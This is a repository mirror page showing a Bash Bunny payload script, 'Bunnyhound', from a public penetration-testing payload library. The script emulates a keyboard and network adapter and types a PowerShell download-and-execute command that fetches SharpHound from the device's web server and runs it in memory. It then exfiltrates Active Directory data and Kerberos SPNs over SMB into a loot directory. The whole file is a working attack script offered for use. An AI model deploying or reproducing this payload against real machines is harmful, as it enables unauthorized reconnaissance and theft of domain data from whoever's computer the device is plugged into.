hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
4e2593beb425eec0a38509ed563bbdbbf64df2c3
bashbunny-payloads/payloads/library/credentials/Bunnyhound/payload.txt
golem445 9fab25740d Bunnyhound and Quickdraw added (#343) 
* Add files via upload

Initial payload

* Add files via upload

Initial payload
2018-05-20 14:23:53 -07:00

64 lines
1.3 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: Bunnyhound
# Author: golem445
# Version: 1.0
# Dependencies: Impacket, gohttp
# Runtime: Dependent on domain size
#
#
# Sets up Ethernet and HID keyboard interfaces simultaneously,
# then uses HID to import Sharphound into memory via local
# web server and execute the attack. Results are exported
# to the loot directory via SMB.
# Start Setup
LED SETUP
# Check dependencies
REQUIRETOOL impacket gohttp
GET SWITCH_POSITION
# Temporary loot directory
mkdir -p /loot/smb/
# Permanent loot directory
mkdir -p /root/udisk/loot/bunnyhound_exfil/
# Set interfaces
ATTACKMODE RNDIS_ETHERNET HID
# Start web server
cd /root/udisk/payloads/$SWITCH_POSITION
gohttp -p 80 &
# Start SMB Server
python /tools/impacket/examples/smbserver.py s /loot/smb &
# Start attack
LED ATTACK
RUN WIN powershell
Q STRING "IEX (New-Object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
Q ENTER
# Wait until files are done copying.
LED STAGE2
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
# Start Cleanup
LED CLEANUP
# Delete Exfil file
rm /loot/smb/EXFILTRATION_COMPLETE
# Move Kerberos SPNS to permanent loot directory
mv /loot/smb/* /root/udisk/loot/bunnyhound_exfil/
# Clean up temporary loot directory
rm -rf /loot/smb/*
# Sync file system
sync
# Complete
LED FINISH
Reference in New Issue View Git Blame Copy Permalink